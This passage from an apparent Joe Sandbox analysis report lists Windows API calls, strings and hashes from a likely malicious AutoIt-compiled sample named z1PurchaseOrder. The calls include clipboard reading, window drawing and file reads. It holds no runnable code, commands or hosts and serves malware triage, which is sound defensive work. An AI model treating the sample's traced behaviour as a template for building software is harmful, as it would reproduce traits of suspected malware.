                                        • SelectObject.GDI32(?,?), ref: 00433E29
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                        • GetWindowLongW.USER32 ref: 00433E8A
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                        • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                        • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                        • GetSysColor.USER32(00000011), ref: 00433F2E
                                        • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                        • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                        • SelectObject.GDI32(?,?), ref: 00433F63
                                        • DeleteObject.GDI32(?), ref: 00433F70
                                        • SelectObject.GDI32(?,?), ref: 00433F78
                                        • DeleteObject.GDI32(00000000), ref: 00433F7B
                                        • SetTextColor.GDI32(?,?), ref: 00433F83
                                        • SetBkColor.GDI32(?,?), ref: 00433F8F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1582027408-0
                                        • Opcode ID: 697ef1e2b469c7a94178de5208286552364449c38c8500f3df1fcdb24db8d4eb
                                        • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                        • Opcode Fuzzy Hash: 697ef1e2b469c7a94178de5208286552364449c38c8500f3df1fcdb24db8d4eb
                                        • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                        APIs
                                        • OpenClipboard.USER32(?), ref: 0046C635
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                        • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                        • CloseClipboard.USER32 ref: 0046C65D
                                        • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                        • CloseClipboard.USER32 ref: 0046C692
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                        • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                        • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                        • CloseClipboard.USER32 ref: 0046C866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                        • String ID: HH
                                        • API String ID: 589737431-2761332787
                                        • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                        • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                        • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                        • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00456692
                                        • GetDesktopWindow.USER32 ref: 004566AA
                                        • GetWindowRect.USER32(00000000), ref: 004566B1
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                        • DestroyWindow.USER32(?), ref: 00456731
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                        • IsWindowVisible.USER32(?), ref: 00456812
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                        • GetWindowRect.USER32(?,?), ref: 0045685C
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                        • GetMonitorInfoW.USER32 ref: 00456894
                                        • CopyRect.USER32(?,?), ref: 004568A8
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                        • String ID: ($,$tooltips_class32
                                        • API String ID: 541082891-3320066284
                                        • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                        • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                        • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                        • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                        APIs
                                        • _wcslen.LIBCMT ref: 00454DCF
                                        • _wcslen.LIBCMT ref: 00454DE2
                                        • __wcsicoll.LIBCMT ref: 00454DEF
                                        • _wcslen.LIBCMT ref: 00454E04
                                        • __wcsicoll.LIBCMT ref: 00454E11
                                        • _wcslen.LIBCMT ref: 00454E24
                                        • __wcsicoll.LIBCMT ref: 00454E31
                                          • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                        • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                        • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                        • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                        • DestroyIcon.USER32(?), ref: 00454FA2
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 2511167534-1154884017
                                        • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                        • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                        • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                        • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                        • _wcslen.LIBCMT ref: 00436B79
                                        • _wcscpy.LIBCMT ref: 00436B9F
                                        • _wcscat.LIBCMT ref: 00436BC0
                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                        • _wcscat.LIBCMT ref: 00436C2A
                                        • _wcscat.LIBCMT ref: 00436C31
                                        • __wcsicoll.LIBCMT ref: 00436C4B
                                        • _wcsncpy.LIBCMT ref: 00436C62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 1503153545-1459072770
                                        • Opcode ID: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
                                        • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                        • Opcode Fuzzy Hash: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
                                        • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                        APIs
                                          • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                        • _fseek.LIBCMT ref: 004527FC
                                        • __wsplitpath.LIBCMT ref: 0045285C
                                        • _wcscpy.LIBCMT ref: 00452871
                                        • _wcscat.LIBCMT ref: 00452886
                                        • __wsplitpath.LIBCMT ref: 004528B0
                                        • _wcscat.LIBCMT ref: 004528C8
                                        • _wcscat.LIBCMT ref: 004528DD
                                        • __fread_nolock.LIBCMT ref: 00452914
                                        • __fread_nolock.LIBCMT ref: 00452925
                                        • __fread_nolock.LIBCMT ref: 00452944
                                        • __fread_nolock.LIBCMT ref: 00452955
                                        • __fread_nolock.LIBCMT ref: 00452976
                                        • __fread_nolock.LIBCMT ref: 00452987
                                        • __fread_nolock.LIBCMT ref: 00452998
                                        • __fread_nolock.LIBCMT ref: 004529A9
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                        • __fread_nolock.LIBCMT ref: 00452A39
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                        • String ID:
                                        • API String ID: 2054058615-0
                                        • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                        • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                        • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                        • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
                                        • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                        • Opcode Fuzzy Hash: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
                                        • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                        APIs
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        • GetWindowRect.USER32(?,?), ref: 004701EA
                                        • GetClientRect.USER32(?,?), ref: 004701FA
                                        • GetSystemMetrics.USER32(00000007), ref: 00470202
                                        • GetSystemMetrics.USER32(00000008), ref: 00470216
                                        • GetSystemMetrics.USER32(00000004), ref: 00470238
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                        • GetSystemMetrics.USER32(00000007), ref: 00470273
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                        • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                        • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                        • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                        • GetClientRect.USER32(?,?), ref: 00470371
                                        • GetStockObject.GDI32(00000011), ref: 00470391
                                        • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                        • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 867697134-248962490
                                        • Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                        • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                        • Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                        • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                        APIs
                                        • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window
                                        • String ID: 0
                                        • API String ID: 2353593579-4108050209
                                        • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                        • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                        • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                        • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                        APIs
                                        • GetSysColor.USER32 ref: 0044A11D
                                        • GetClientRect.USER32(?,?), ref: 0044A18D
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                        • GetWindowDC.USER32(?), ref: 0044A1B3
                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                        • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                        • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                        • GetSysColor.USER32(0000000F), ref: 0044A216
                                        • GetSysColor.USER32(00000005), ref: 0044A21E
                                        • GetWindowDC.USER32 ref: 0044A277
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                        • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                        • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                        • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                        • GetStockObject.GDI32(00000005), ref: 0044A312
                                        • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                        • String ID:
                                        • API String ID: 1744303182-0
                                        • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                        • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                        • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                        • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsicoll$__wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                        • API String ID: 790654849-1810252412
                                        • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                        • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                        • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                        • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                        • API String ID: 0-1896584978
                                        • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                        • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                        • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                        • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: InitVariant
                                        • String ID:
                                        • API String ID: 1927566239-0
                                        • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                        • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                        • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                        • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                        APIs
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                        • GetForegroundWindow.USER32 ref: 0046DBA4
                                        • IsWindow.USER32(?), ref: 0046DBDE
                                        • GetDesktopWindow.USER32 ref: 0046DCB5
                                        • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                        • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
